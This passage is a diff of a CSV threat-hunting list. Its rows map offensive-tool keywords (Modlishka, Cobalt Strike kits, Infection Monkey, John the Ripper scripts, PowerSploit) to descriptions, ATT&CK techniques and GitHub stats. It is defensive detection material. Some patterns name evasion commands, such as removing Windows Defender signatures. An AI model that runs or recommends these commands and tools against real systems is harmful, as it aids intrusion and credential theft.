without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. 
which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*module inject *","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*modules/enumrate.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*mogwailabs*","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mojo.5688.8052.183894939787088877##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo.5688.8052.35780273329370473##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An 
automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An 
automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*monoxgas/sRDI*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*moonD4rk/HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*MooseDojo*","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*morphHTA*","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","503","142","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z" "*mortar-main.zip*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*mousejack*","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","1203","255","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z" "*mouseshaker.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" -"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. 
and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8639","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" +"*MoveKit-master.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-msbuild * http move.csproj*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*move-pre-custom-file *.exe *","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*movfuscator*","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","10","8640","392","2023-03-04T21:15:10Z","2015-06-16T01:49:40Z" "*Mozilla/5.0 (*-bit) dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. 
Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" -"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mozilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*mozlz4-win32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*MpCmdRun.exe* -RemoveDefinitions -All*","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*mpgn/BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" -"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - 